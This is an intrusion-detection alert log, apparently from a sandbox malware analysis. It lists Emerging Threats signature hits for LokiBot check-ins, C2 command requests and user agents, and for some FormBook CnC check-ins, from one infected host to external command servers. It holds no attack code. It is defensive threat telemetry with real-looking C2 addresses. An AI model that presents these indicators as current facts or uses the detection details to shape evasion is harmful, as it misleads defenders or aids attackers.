                                            05/29/24-15:44:44.907872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.945.61.137.215
                                            05/29/24-15:43:46.833672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.945.61.137.215
                                            05/29/24-15:44:44.907872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.945.61.137.215
                                            05/29/24-15:45:59.101278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.945.61.137.215
                                            05/29/24-15:45:31.801523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.945.61.137.215
                                            05/29/24-15:44:28.419439TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.945.61.137.215
                                            05/29/24-15:43:46.833672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.945.61.137.215
                                            05/29/24-15:45:31.801523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.945.61.137.215
                                            05/29/24-15:43:01.102766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.945.61.137.215
                                            05/29/24-15:45:45.418561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.945.61.137.215
                                            05/29/24-15:43:17.361906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.945.61.137.215
                                            05/29/24-15:43:22.752549TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.945.61.137.215
                                            05/29/24-15:43:01.102766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.945.61.137.215
                                            05/29/24-15:44:14.760597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.945.61.137.215
                                            05/29/24-15:42:31.346168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.945.61.137.215
                                            05/29/24-15:44:20.226591TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.945.61.137.215
                                            05/29/24-15:44:07.397794TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.9104.21.10.127
                                            05/29/24-15:44:12.009845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.945.61.137.215
                                            05/29/24-15:44:33.942473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.945.61.137.215
                                            05/29/24-15:44:12.009845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.945.61.137.215
                                            05/29/24-15:44:33.942473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977180192.168.2.945.61.137.215
                                            05/29/24-15:46:10.058300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.945.61.137.215
                                            05/29/24-15:43:52.300724TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.945.61.137.215
                                            05/29/24-15:43:58.198557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.945.61.137.215
                                            05/29/24-15:43:27.019236TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.9103.224.212.213
                                            05/29/24-15:43:36.155572TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.945.61.137.215
                                            05/29/24-15:44:06.434631TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.945.61.137.215
                                            05/29/24-15:43:58.198557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.945.61.137.215
                                            05/29/24-15:42:47.538291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.945.61.137.215
                                            05/29/24-15:44:06.434631TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.945.61.137.215
                                            05/29/24-15:44:20.226591TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.945.61.137.215
                                            05/29/24-15:43:33.478550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.945.61.137.215
                                            05/29/24-15:42:20.544811TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.945.61.137.215
                                            05/29/24-15:43:49.526860TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.945.61.137.215
                                            05/29/24-15:42:41.960861TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.945.61.137.215
                                            05/29/24-15:43:11.942922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.945.61.137.215
                                            05/29/24-15:46:04.642667TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.945.61.137.215
                                            05/29/24-15:42:58.351209TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.945.61.137.215
                                            05/29/24-15:42:33.985205TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.945.61.137.215
                                            05/29/24-15:45:30.851082TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.9101.36.116.238
                                            05/29/24-15:43:41.466952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.945.61.137.215
                                            05/29/24-15:44:31.132505TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.945.61.137.215
                                            05/29/24-15:44:39.311748TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.945.61.137.215
                                            05/29/24-15:45:06.533178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.945.61.137.215
                                            05/29/24-15:44:50.468524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.945.61.137.215
                                            05/29/24-15:43:25.482920TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.945.61.137.215
                                            05/29/24-15:44:25.723486TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.945.61.137.215
                                            05/29/24-15:45:26.168825TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.945.61.137.215
                                            05/29/24-15:45:06.533178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.945.61.137.215
                                            05/29/24-15:44:50.468524TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.945.61.137.215
                                            05/29/24-15:43:09.282527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.945.61.137.215
                                            05/29/24-15:43:25.482920TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.945.61.137.215
                                            05/29/24-15:46:07.455148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.945.61.137.215
                                            05/29/24-15:43:09.282527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.945.61.137.215
                                            05/29/24-15:42:55.680526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.945.61.137.215
                                            05/29/24-15:42:39.353995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.945.61.137.215
                                            05/29/24-15:43:14.729917TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.945.61.137.215
                                            05/29/24-15:44:22.948804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.945.61.137.215
                                            05/29/24-15:43:28.214472TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.945.61.137.215
                                            05/29/24-15:44:36.658231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.945.61.137.215
                                            05/29/24-15:45:26.168825TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.945.61.137.215
                                            05/29/24-15:43:44.149214TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.945.61.137.215
                                            05/29/24-15:45:42.784784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.945.61.137.215
                                            05/29/24-15:42:31.346168TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.945.61.137.215
                                            05/29/24-15:43:06.437304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.945.61.137.215
                                            05/29/24-15:43:06.437304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.945.61.137.215
                                            05/29/24-15:45:34.630779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.945.61.137.215
                                            05/29/24-15:43:17.361906TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.945.61.137.215
                                            05/29/24-15:45:42.784784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.945.61.137.215
                                            05/29/24-15:45:45.418561TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.945.61.137.215
                                            05/29/24-15:42:15.295734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.945.61.137.215
                                            05/29/24-15:44:47.749478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.945.61.137.215
                                            05/29/24-15:44:53.150602TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.945.61.137.215
                                            05/29/24-15:42:28.740548TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.945.61.137.215
                                            05/29/24-15:46:04.642667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.945.61.137.215
                                            05/29/24-15:44:53.150602TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.945.61.137.215
                                            05/29/24-15:45:01.201418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.945.61.137.215
                                            05/29/24-15:45:50.755707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.945.61.137.215
                                            05/29/24-15:43:09.282527TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.945.61.137.215
                                            05/29/24-15:42:28.740548TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.945.61.137.215
                                            05/29/24-15:43:55.212846TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.945.61.137.215
                                            05/29/24-15:45:01.201418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.945.61.137.215
                                            05/29/24-15:45:50.755707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980180192.168.2.945.61.137.215
                                            05/29/24-15:46:07.455148TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.945.61.137.215
                                            05/29/24-15:44:03.719373TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.945.61.137.215
                                            05/29/24-15:43:33.478550TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.945.61.137.215
                                            05/29/24-15:45:17.857076TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.945.61.137.215
                                            05/29/24-15:42:33.985205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.945.61.137.215
                                            05/29/24-15:44:17.418907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.945.61.137.215
                                            05/29/24-15:43:30.801731TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.945.61.137.215
                                            05/29/24-15:44:17.418907TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.945.61.137.215
                                            05/29/24-15:45:20.705538TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.945.61.137.215
                                            05/29/24-15:46:04.642667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.945.61.137.215
                                            05/29/24-15:45:17.857076TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.945.61.137.215
                                            05/29/24-15:43:30.801731TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.945.61.137.215
                                            05/29/24-15:42:10.038270TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.945.61.137.215
                                            05/29/24-15:42:50.288079TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.945.61.137.215
                                            05/29/24-15:42:47.538291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.945.61.137.215
                                            05/29/24-15:42:52.927476TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.945.61.137.215
                                            05/29/24-15:44:20.226591TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.945.61.137.215
                                            05/29/24-15:44:28.419439TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.945.61.137.215
                                            05/29/24-15:45:53.430975TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.945.61.137.215
                                            05/29/24-15:44:28.419439TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.945.61.137.215
                                            05/29/24-15:43:44.149214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.945.61.137.215
                                            05/29/24-15:45:15.181530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.945.61.137.215
                                            05/29/24-15:45:03.852643TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.945.61.137.215
                                            05/29/24-15:44:00.934566TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.945.61.137.215
                                            05/29/24-15:46:01.734415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.945.61.137.215
                                            05/29/24-15:44:42.013116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.945.61.137.215
                                            05/29/24-15:44:33.942473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.945.61.137.215
                                            05/29/24-15:44:14.760597TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.945.61.137.215
                                            05/29/24-15:46:10.058300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.945.61.137.215
                                            05/29/24-15:44:55.765644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.945.61.137.215
                                            05/29/24-15:43:58.198557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.945.61.137.215
                                            05/29/24-15:44:42.013116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.945.61.137.215
                                            05/29/24-15:42:47.538291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.945.61.137.215
                                            05/29/24-15:43:20.008059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.945.61.137.215
                                            05/29/24-15:45:28.962608TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.945.61.137.215
                                            05/29/24-15:42:26.177150TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.945.61.137.215
                                            05/29/24-15:44:55.765644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.945.61.137.215
                                            05/29/24-15:42:46.507602TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.9216.40.34.41
                                            05/29/24-15:45:48.086059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979980192.168.2.945.61.137.215
                                            05/29/24-15:45:50.249805TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980080192.168.2.991.195.240.19
                                            05/29/24-15:43:03.791896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.945.61.137.215
                                            05/29/24-15:43:38.811867TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.945.61.137.215
                                            05/29/24-15:45:48.086059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.945.61.137.215
                                            05/29/24-15:43:11.942922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.945.61.137.215
                                            05/29/24-15:42:12.652341TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.945.61.137.215
                                            05/29/24-15:45:39.931883TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.945.61.137.215
                                            05/29/24-15:45:06.533178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.945.61.137.215
                                            05/29/24-15:43:38.811867TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.945.61.137.215
                                            05/29/24-15:45:31.801523TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.945.61.137.215
                                            05/29/24-15:43:41.466952TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.945.61.137.215
                                            05/29/24-15:45:56.184812TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.945.61.137.215
                                            05/29/24-15:45:09.224417TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.945.61.137.215
                                            05/29/24-15:43:25.482920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.945.61.137.215
                                            05/29/24-15:45:56.184812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.945.61.137.215
                                            05/29/24-15:44:50.468524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.945.61.137.215
                                            05/29/24-15:42:55.680526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.945.61.137.215
                                            05/29/24-15:44:48.471145TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977780192.168.2.934.132.146.171
                                            05/29/24-15:46:01.734415TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.945.61.137.215
                                            05/29/24-15:44:22.948804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.945.61.137.215
                                            05/29/24-15:44:22.948804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.945.61.137.215
                                            05/29/24-15:44:36.658231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.945.61.137.215
                                            05/29/24-15:44:36.658231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.945.61.137.215
                                            05/29/24-15:45:23.375856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.945.61.137.215
                                            05/29/24-15:46:10.058300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.2.945.61.137.215
                                            05/29/24-15:42:55.680526TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.945.61.137.215
                                            05/29/24-15:43:36.155572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.945.61.137.215
                                            05/29/24-15:43:14.729917TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.945.61.137.215
                                            05/29/24-15:43:22.752549TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.945.61.137.215
                                            05/29/24-15:42:52.927476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.945.61.137.215
                                            05/29/24-15:43:06.437304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.945.61.137.215
                                            05/29/24-15:44:33.942473TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.945.61.137.215
                                            05/29/24-15:43:01.102766TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.945.61.137.215
                                            05/29/24-15:42:39.353995TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.945.61.137.215
                                            05/29/24-15:43:22.752549TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.945.61.137.215
                                            05/29/24-15:44:31.132505TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977080192.168.2.945.61.137.215
                                            05/29/24-15:44:47.749478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.945.61.137.215
                                            05/29/24-15:44:39.311748TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.945.61.137.215
                                            05/29/24-15:43:46.833672TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.945.61.137.215
                                            05/29/24-15:44:31.132505TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.945.61.137.215
                                            05/29/24-15:45:09.224417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.945.61.137.215
                                            05/29/24-15:43:25.482920TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.945.61.137.215
                                            05/29/24-15:44:25.723486TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976780192.168.2.945.61.137.215
                                            05/29/24-15:46:04.642667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.945.61.137.215
                                            05/29/24-15:44:17.418907TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.945.61.137.215
                                            05/29/24-15:42:20.544811TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.945.61.137.215
                                            05/29/24-15:44:47.749478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.945.61.137.215
                                            05/29/24-15:44:25.723486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.945.61.137.215
                                            05/29/24-15:45:09.224417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.945.61.137.215
                                            05/29/24-15:44:03.719373TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.945.61.137.215
                                            05/29/24-15:45:17.857076TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.945.61.137.215
                                            05/29/24-15:44:03.719373TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.945.61.137.215
                                            05/29/24-15:42:33.985205TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.945.61.137.215
                                            05/29/24-15:43:11.942922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.945.61.137.215
                                            05/29/24-15:43:30.801731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.945.61.137.215
                                            05/29/24-15:45:26.168825TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.945.61.137.215
                                            05/29/24-15:42:33.985205TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.945.61.137.215
                                            05/29/24-15:43:49.526860TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.945.61.137.215
                                            05/29/24-15:45:34.630779TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.945.61.137.215
                                            05/29/24-15:43:44.149214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.945.61.137.215
                                            05/29/24-15:42:36.746086TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.945.61.137.215
                                            05/29/24-15:45:15.181530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.945.61.137.215
                                            05/29/24-15:43:44.149214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.945.61.137.215
                                            05/29/24-15:42:17.880992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.945.61.137.215
                                            05/29/24-15:44:00.934566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.945.61.137.215
                                            05/29/24-15:43:28.214472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.945.61.137.215
                                            05/29/24-15:45:15.181530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.945.61.137.215
                                            05/29/24-15:43:14.729917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.945.61.137.215
                                            05/29/24-15:46:01.734415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980580192.168.2.945.61.137.215
                                            05/29/24-15:44:06.434631TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.945.61.137.215
                                            05/29/24-15:44:00.934566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.945.61.137.215
                                            05/29/24-15:46:01.734415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.945.61.137.215
                                            05/29/24-15:45:53.430975TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.945.61.137.215
                                            05/29/24-15:42:17.880992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.945.61.137.215
                                            05/29/24-15:45:53.430975TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980280192.168.2.945.61.137.215
                                            05/29/24-15:44:28.419439TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.945.61.137.215
                                            05/29/24-15:44:42.013116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.945.61.137.215
                                            05/29/24-15:44:55.765644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.945.61.137.215
                                            05/29/24-15:44:50.468524TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.945.61.137.215
                                            05/29/24-15:44:44.907872TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.945.61.137.215
                                            05/29/24-15:45:06.533178TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.945.61.137.215
                                            05/29/24-15:43:20.008059TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.945.61.137.215
                                            05/29/24-15:45:48.086059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.945.61.137.215
                                            05/29/24-15:43:03.791896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.945.61.137.215
                                            05/29/24-15:43:20.008059TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.945.61.137.215
                                            05/29/24-15:43:03.791896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.945.61.137.215
                                            05/29/24-15:42:50.288079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.945.61.137.215
                                            05/29/24-15:42:26.177150TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.945.61.137.215
                                            05/29/24-15:42:50.288079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.945.61.137.215
                                            05/29/24-15:42:41.960861TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.945.61.137.215
                                            05/29/24-15:43:55.212846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.945.61.137.215
                                            05/29/24-15:45:59.101278TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.945.61.137.215
                                            05/29/24-15:42:41.960861TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.945.61.137.215
                                            05/29/24-15:42:15.295734TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.945.61.137.215
                                            05/29/24-15:42:58.351209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.945.61.137.215
                                            05/29/24-15:43:38.811867TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.945.61.137.215
                                            05/29/24-15:45:39.931883TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.945.61.137.215
                                            05/29/24-15:42:28.740548TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.945.61.137.215
                                            05/29/24-15:44:09.285920TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.945.61.137.215
                                            05/29/24-15:42:12.652341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.945.61.137.215
                                            05/29/24-15:42:58.351209TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.945.61.137.215
                                            05/29/24-15:45:56.184812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.945.61.137.215
                                            05/29/24-15:44:58.470593TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.945.61.137.215
                                            05/29/24-15:44:12.009845TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.945.61.137.215
                                            05/29/24-15:45:37.356647TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.945.61.137.215
                                            05/29/24-15:45:23.375856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978980192.168.2.945.61.137.215
                                            05/29/24-15:45:03.852643TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.945.61.137.215
                                            05/29/24-15:45:37.356647TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.945.61.137.215
                                            05/29/24-15:43:52.300724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.945.61.137.215
                                            05/29/24-15:43:58.198557TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.945.61.137.215
                                            05/29/24-15:45:42.784784TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.945.61.137.215
                                            05/29/24-15:43:36.155572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.945.61.137.215
                                            05/29/24-15:43:52.300724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.945.61.137.215
                                            05/29/24-15:45:23.375856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.945.61.137.215
                                            05/29/24-15:43:36.155572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.945.61.137.215
                                            TimestampSource PortDest PortSource IPDest IP
